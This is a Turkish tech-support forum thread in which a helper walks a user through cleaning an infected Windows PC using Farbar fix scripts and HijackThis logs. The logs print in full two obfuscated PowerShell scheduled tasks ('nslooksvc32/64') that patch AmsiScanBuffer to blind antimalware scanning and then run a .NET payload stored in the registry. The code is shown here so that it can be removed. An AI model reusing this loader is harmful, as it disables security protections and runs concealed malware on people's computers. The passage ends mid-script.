AlreadyBroken494
Hectopat
- Katılım
- 21 Nisan 2021
- Mesajlar
- 103
- Çözümler
- 1
Daha fazla
- Cinsiyet
- Erkek
Raporu inceleyene kadar bekleyin, sıfırlamaya gerek yok.
Beklemedeyim hocam.
Raporu inceleyene kadar bekleyin, sıfırlamaya gerek yok.
start::
emptytemp:
virustotal: C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atieclxx.exe;C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe;C:\Program Files\Mozilla Firefox\firefox.exe;C:\Windows\System32\amdfendrsr.exe;C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atiesrxx.exe;C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe;C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe;D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe;C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe;D:\Razer Gamebooster\Razer Cortex\RzKLService.exe;C:\Windows\system32\Device.dll;C:\Windows\system32\ISDone.dll;C:\Windows\system32\Platform.dll;C:\Windows\bsdsetupDH.dll;C:\Windows\SysWOW64\ADsSecurity.dll;C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe
File: C:\Users\muhan\AppData\Local\Yandex;C:\Users\muhan\AppData\Roaming\SmartSteamEmu;C:\Users\muhan\AppData\LocalLow\Redbeet Interactive;C:\Users\muhan\AppData\Roaming\Windows;C:\Users\muhan\AppData\Local\7b85455024c255fb2d382134ede54108;C:\Users\muhan\AppData\Local\ADMITLoving;C:\Users\muhan\AppData\Local\Cloud Game;(FragSoft) C:\Windows\system32\ISDone.dll;C:\Users\muhan\.opera;C:\Users\muhan\Downloads\.opera
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
BootExecute:
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
Task: {52D709F9-9C14-424B-9077-5D714CEF9E0D} - System32\Tasks\TR_FastScan_AtLogon => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {709D0865-F852-409F-B5BC-139428474DF8} - System32\Tasks\TR_FastScan_Daily_Yılmaz => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software)
Task: {96E4AAA5-2DF0-4BF4-AA59-0C9ABDAB6C0A} - System32\Tasks\nslooksvc32 => powershell "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2227 more characters).
Task: {BFCC12A3-664B-42EB-8B9F-2A4BB1629A5C} - System32\Tasks\TR_AntiHijack => C:\Program Files (x86)\Trojan Remover\TRAntiHJ.exe (No File)
Task: {C9226DF5-08C3-486B-92A1-3039634E7EF5} - System32\Tasks\TR_Updater => C:\Program Files (x86)\Trojan Remover\Trupd.exe [6384408 2022-01-06] (Simply Super Software -> Simply Super Software)
Task: {D1333CC2-6205-4BAE-8ED2-B9A2A50A1599} - System32\Tasks\nslooksvc64 => powershell "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2220 more characters).
Tcpip\..\Interfaces\{05b349b0-aef9-4fed-b459-1625b65a9eda}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{ae71b50f-2054-491a-b219-1eb1f48c7549}: [DhcpNameServer] 192.168.42.129
FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\kl_prefs_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.js [2022-03-06] <==== ATTENTION (Points to *.cfg file)
FF ExtraCheck: C:\Program Files\mozilla firefox\kl_config_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.cfg [2022-03-06] <==== ATTENTION
CHR Extension: (Safe Torrent Scanner) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-01-16]
CHR Extension: (Fishing.io) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijifibpcinhcgbmclfilhcbcojmkdemh [2021-12-22]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971504 2021-12-26] (McAfee, LLC -> McAfee, LLC)
2022-03-06 11:41 - 2022-03-06 11:41 - 000004146 _____ C:\Windows\system32\Tasks\TR_FastScan_Daily_Yılmaz
2022-03-06 11:41 - 2022-03-06 11:41 - 000004004 _____ C:\Windows\system32\Tasks\TR_FastScan_AtLogon
2022-03-06 11:41 - 2022-03-06 11:41 - 000003946 _____ C:\Windows\system32\Tasks\TR_Updater
2022-03-06 11:41 - 2022-03-06 11:41 - 000003786 _____ C:\Windows\system32\Tasks\TR_AntiHijack
2022-03-06 11:41 - 2022-03-06 11:41 - 000001371 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover FastScan.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover Updater.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000001250 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover.lnk
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Users\muhan\Documents\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\ProgramData\Simply Super Software
2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Program Files (x86)\Trojan Remover
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\McAfee
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\AVG
2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\Program Files\McAfee
2022-03-03 16:27 - 2022-03-05 14:52 - 000000000 ____D C:\ProgramData\Avast Software
AV: Kaspersky Anti-Virus (Disabled - Up to date) {4F76F112-43EB-40E8-11D8-F7BD1853EA23}
FW: Kaspersky Security Cloud (Disabled) {774D7037-0984-41B0-3A87-5E88E680AD58}
Kaspersky Anti-Virus (HKLM-x32\...\{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976}) (Version: 21.3.10.391 - Kaspersky) Hidden
Links version 1.0 (HKU\S-1-5-21-1593825937-2386105780-1848293327-1005\...\Links_is1) (Version: 1.0 - Links) <==== ATTENTION
ContextMenuHandlers1: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers2: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
ContextMenuHandlers6: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software)
FirewallRules: [{9512C89E-6BE2-4C79-8A83-66AE2CB09ACC}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{559034AF-7527-45AB-A0AB-59178D3B1518}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File
FirewallRules: [{B7E90CAA-1493-4949-86A0-F0D04A4CC2A7}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{9FE56EC5-53B8-4560-9040-28D919EDDAAF}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{51654940-0E91-496C-94F9-388259243044}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
FirewallRules: [{2A048AE4-BDFE-4E81-894F-AD0EB00E8DBA}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File
end::
Sırasıyla,
Denetim Masası'ndan; Kaspersky, McAfee, trojan remover, links ve diğer bilmediğim tüm uygulamaları kaldır.
Aşağıdaki araçları sırayla çalıştırıp kalıntıları temizle.
Kodu kopyaladıktan sonra Farbar'dan fix tuşuna bas. Fixlog.txt adındaki dosyayı burada paylaş.
Kod:start:: emptytemp: virustotal: C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atieclxx.exe;C:\Users\muhan\AppData\Local\Programs\Blitz\Blitz.exe;C:\Program Files\Mozilla Firefox\firefox.exe;C:\Windows\System32\amdfendrsr.exe;C:\Windows\System32\DriverStore\FileRepository\u0376944.inf_amd64_7a28758ed8b2ac21\B376966\atiesrxx.exe;C:\Program Files\AMD\CNext\CNext\CPUMetricsServer.exe;C:\Program Files (x86)\Razer\Razer Services\GMS\GameManagerService.exe;D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe;C:\Program Files (x86)\Razer\Razer Services\Razer Central\RazerCentralService.exe;D:\Razer Gamebooster\Razer Cortex\RzKLService.exe;C:\Windows\system32\Device.dll;C:\Windows\system32\ISDone.dll;C:\Windows\system32\Platform.dll;C:\Windows\bsdsetupDH.dll;C:\Windows\SysWOW64\ADsSecurity.dll;C:\Program Files\AMD\CNext\CNext\QtWebEngineProcess.exe File: C:\Users\muhan\AppData\Local\Yandex;C:\Users\muhan\AppData\Roaming\SmartSteamEmu;C:\Users\muhan\AppData\LocalLow\Redbeet Interactive;C:\Users\muhan\AppData\Roaming\Windows;C:\Users\muhan\AppData\Local\7b85455024c255fb2d382134ede54108;C:\Users\muhan\AppData\Local\ADMITLoving;C:\Users\muhan\AppData\Local\Cloud Game;(FragSoft) C:\Windows\system32\ISDone.dll;C:\Users\muhan\.opera;C:\Users\muhan\Downloads\.opera HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION. BootExecute: GroupPolicy: Restriction ? <==== ATTENTION. Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION. Task: {52D709F9-9C14-424B-9077-5D714CEF9E0D} - System32\Tasks\TR_FastScan_AtLogon => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software) Task: {709D0865-F852-409F-B5BC-139428474DF8} - System32\Tasks\TR_FastScan_Daily_Yılmaz => C:\Program Files (x86)\Trojan Remover\Trjscan.exe [6467352 2022-01-28] (Simply Super Software -> Simply Super Software) Task: {96E4AAA5-2DF0-4BF4-AA59-0C9ABDAB6C0A} - System32\Tasks\nslooksvc32 => powershell "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2227 more characters). Task: {BFCC12A3-664B-42EB-8B9F-2A4BB1629A5C} - System32\Tasks\TR_AntiHijack => C:\Program Files (x86)\Trojan Remover\TRAntiHJ.exe (No File) Task: {C9226DF5-08C3-486B-92A1-3039634E7EF5} - System32\Tasks\TR_Updater => C:\Program Files (x86)\Trojan Remover\Trupd.exe [6384408 2022-01-06] (Simply Super Software -> Simply Super Software) Task: {D1333CC2-6205-4BAE-8ED2-B9A2A50A1599} - System32\Tasks\nslooksvc64 => powershell "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAcces (the data entry has 2220 more characters). Tcpip\..\Interfaces\{05b349b0-aef9-4fed-b459-1625b65a9eda}: [DhcpNameServer] 192.168.42.129 Tcpip\..\Interfaces\{ae71b50f-2054-491a-b219-1eb1f48c7549}: [DhcpNameServer] 192.168.42.129 FF HKLM\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found. FF HKLM-x32\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Anti-Virus 21.3\FFExt\light_plugin_firefox\addon.xpi => not found. FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\kl_prefs_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.js [2022-03-06] <==== ATTENTION (Points to *.cfg file) FF ExtraCheck: C:\Program Files\mozilla firefox\kl_config_62fbb8f7_c917_4cf7_957a_aad2b8fa768c.cfg [2022-03-06] <==== ATTENTION. CHR Extension: (Safe Torrent Scanner) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\aegnopegbbhjeeiganiajffnalhlkkjb [2022-01-16] CHR Extension: (Fishing.io) - C:\Users\muhan\AppData\Local\Google\Chrome\User Data\Default\Extensions\ijifibpcinhcgbmclfilhcbcojmkdemh [2021-12-22] CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb] R2 McAfee WebAdvisor; C:\Program Files\McAfee\WebAdvisor\ServiceHost.exe [971504 2021-12-26] (McAfee, LLC -> McAfee, LLC) 2022-03-06 11:41 - 2022-03-06 11:41 - 000004146 _____ C:\Windows\system32\Tasks\TR_FastScan_Daily_Yılmaz 2022-03-06 11:41 - 2022-03-06 11:41 - 000004004 _____ C:\Windows\system32\Tasks\TR_FastScan_AtLogon 2022-03-06 11:41 - 2022-03-06 11:41 - 000003946 _____ C:\Windows\system32\Tasks\TR_Updater 2022-03-06 11:41 - 2022-03-06 11:41 - 000003786 _____ C:\Windows\system32\Tasks\TR_AntiHijack 2022-03-06 11:41 - 2022-03-06 11:41 - 000001371 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover FastScan.lnk 2022-03-06 11:41 - 2022-03-06 11:41 - 000001271 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover Updater.lnk 2022-03-06 11:41 - 2022-03-06 11:41 - 000001250 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Trojan Remover.lnk 2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Users\muhan\Documents\Simply Super Software. 2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\ProgramData\Simply Super Software. 2022-03-06 11:41 - 2022-03-06 11:41 - 000000000 ____D C:\Program Files (x86)\Trojan Remover. 2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\McAfee 2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\ProgramData\AVG 2021-12-26 14:45 - 2021-12-26 14:45 - 000000000 ____D C:\Program Files\McAfee 2022-03-03 16:27 - 2022-03-05 14:52 - 000000000 ____D C:\ProgramData\Avast Software. AV: Kaspersky Anti-Virus (Disabled - Up to date) {4F76F112-43EB-40E8-11D8-F7BD1853EA23} FW: Kaspersky Security Cloud (Disabled) {774D7037-0984-41B0-3A87-5E88E680AD58} Kaspersky Anti-Virus (HKLM-x32\...\{4FC79BE9-AD63-46C0-9626-E4F6BCE6A976}) (Version: 21.3.10.391 - Kaspersky) Hidden. Links version 1.0 (HKU\S-1-5-21-1593825937-2386105780-1848293327-1005\...\Links_is1) (Version: 1.0 - Links) <==== ATTENTION. ContextMenuHandlers1: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software) ContextMenuHandlers2: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software) ContextMenuHandlers6: [Trojan Remover] -> {52B87208-9CCF-42C9-B88E-069281105805} => C:\Program Files (x86)\Trojan Remover\Trshlex64.dll [2018-10-25] (Simply Super Software -> Simply Super Software) FirewallRules: [{9512C89E-6BE2-4C79-8A83-66AE2CB09ACC}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File. FirewallRules: [{559034AF-7527-45AB-A0AB-59178D3B1518}] => (Allow) C:\Program Files (x86)\360\Total Security\safemon\QHSafeTray.exe => No File. FirewallRules: [{B7E90CAA-1493-4949-86A0-F0D04A4CC2A7}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File. FirewallRules: [{9FE56EC5-53B8-4560-9040-28D919EDDAAF}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File. FirewallRules: [{51654940-0E91-496C-94F9-388259243044}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File. FirewallRules: [{2A048AE4-BDFE-4E81-894F-AD0EB00E8DBA}] => (Allow) C:\Program Files (x86)\360\Total Security\360TsLiveUpd.exe => No File. end::
Olmaz. Chrome'dan Fishing.io ve Safe Torrent Scanner adlı eklentileri kaldırın. Aşağıdaki raporu paylaşın sonrasında.
HijackThis Log Paylaşımı ve Çözümleri
Sisteminizde yaşadığınız performans düşüşü, kilitlenme, zararlı etkisi, uygulama hatalarından kaynaklanan sorunsalları analiz etmek ve performans iyileştirmesi, zararlı etkisini inaktif etmek için bize HijackThis yazılımı ile yaptığınız tarama Logunu burada paylaşmanız gerekmektedir...www.technopat.net
O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3
O22 - BITS Job: Fix all (including legit)
O22 - Task (.job): (disabled) nslooksvc32.job - (no file)
O22 - Task (.job): (disabled) nslooksvc64.job - (no file)
O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing)
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing)
O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$BLsWUgXPabQYEv=$esKTVjEbEydev.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$zhDFYQRlKZJklGZhJlg=KUUibsYzdVVZ @([String])([IntPtr]);$HouUUsVdZbZakOwaaqnUNb=KUUibsYzdVVZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FjTfoJARZLM=$esKTVjEbEydev.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$qIROLtoHyfQMRl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Load'+'LibraryA')));$BzKZfVwvYaCgfQTdI=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$FjTfoJARZLM,[Object]('Vir'+'tual'+'Pro'+'tect')));$gqDzMuu=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qIROLtoHyfQMRl,$zhDFYQRlKZJklGZhJlg).Invoke('a'+'m'+'si.dll');$thgHnFpRwqzfvbdgl=$BLsWUgXPabQYEv.Invoke($Null,@([Object]$gqDzMuu,[Object]('Ams'+'iSc'+'an'+'Buffer')));$tFojzPMnml=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,4,[ref]$tFojzPMnml);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$thgHnFpRwqzfvbdgl,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BzKZfVwvYaCgfQTdI,$HouUUsVdZbZakOwaaqnUNb).Invoke($thgHnFpRwqzfvbdgl,[uint32]8,0x20,[ref]$tFojzPMnml);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O22 - Task: nslooksvc64 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:yZzuiYRezadz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EWellkmPyYZzro,[Parameter(Position=1)][Type]$LjtIPhnXDu)$XEsJbemsTkG=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$XEsJbemsTkG.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');$XEsJbemsTkG.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$LjtIPhnXDu,$EWellkmPyYZzro).SetImplementationFlags('Runtime,Managed');Write-Output $XEsJbemsTkG.CreateType();}$EznyfjngDAhAs=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$sYOssrpLYJJpjX=$EznyfjngDAhAs.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$aAfmdyFNvhcWtryWFmg=yZzuiYRezadz @([String])([IntPtr]);$iyqMBNsEEaEwzblKaRROoC=yZzuiYRezadz @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LUQEzwkExfi=$EznyfjngDAhAs.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$vESqRXeDRnNXMw=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Load'+'LibraryA')));$gsFUORhqEFVSkXOmO=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$LUQEzwkExfi,[Object]('Vir'+'tual'+'Pro'+'tect')));$MyWMWhO=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($vESqRXeDRnNXMw,$aAfmdyFNvhcWtryWFmg).Invoke('a'+'m'+'si.dll');$SNXmKatLTctWUQlcY=$sYOssrpLYJJpjX.Invoke($Null,@([Object]$MyWMWhO,[Object]('Ams'+'iSc'+'an'+'Buffer')));$VNvaCoBJHL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,4,[ref]$VNvaCoBJHL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SNXmKatLTctWUQlcY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gsFUORhqEFVSkXOmO,$iyqMBNsEEaEwzblKaRROoC).Invoke($SNXmKatLTctWUQlcY,[uint32]8,0x20,[ref]$VNvaCoBJHL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
O23 - Service S3: Rockstar Game Library Service - (Rockstar Service) - D:\Games\Grand Theft Auto V\Launcher\RockstarService.exe (file missing)
Bunları fixleyin.
Kod:O22 - BITS Job: (download) {2982ED1B-9DF7-4A96-8A4F-AF6135D30AB2} - http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/fay7bjcbpgagtaithciieeva4u_20220222.431134436/obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 -> C:\Users\muhan\AppData\Local\Temp\chrome_BITS_9464_2144227497\obedbbhbpmojnkanicioggnmelmoomoc_20220222.431134436_all_TR500000_ktwdq23epwopvzpl77f6epukky.crx3 O22 - BITS Job: Fix all (including legit) O22 - Task (.job): (disabled) nslooksvc32.job - (no file) O22 - Task (.job): (disabled) nslooksvc64.job - (no file) O22 - Task: (damaged) C:\Windows\System32\Tasks\McAfee (empty) O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc32 (key missing) O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\nslooksvc64 (key missing) O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\Windows\system32\rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft) O22 - Task: Kaspersky_Upgrade_Launcher_{278ADC42-419D-4547-A6CA-5B74BE0AD901} - C:\Program Files\Common Files\AV\Kaspersky Lab\upgrade_launcher.exe /waitUpgrade (file missing) O22 - Task: nslooksvc32 - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "function Local:KUUibsYzdVVZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$flCbqwKNrRNgbw,[Parameter(Position=1)][Type]$trxeVYymQW)$paalNHZeNmu=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$paalNHZeNmu.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');$paalNHZeNmu.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$trxeVYymQW,$flCbqwKNrRNgbw).SetImplementationFlags('Runtime,Managed');Write-Output $paalNHZeNmu.CreateType();}$esKTVjEbEydev=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 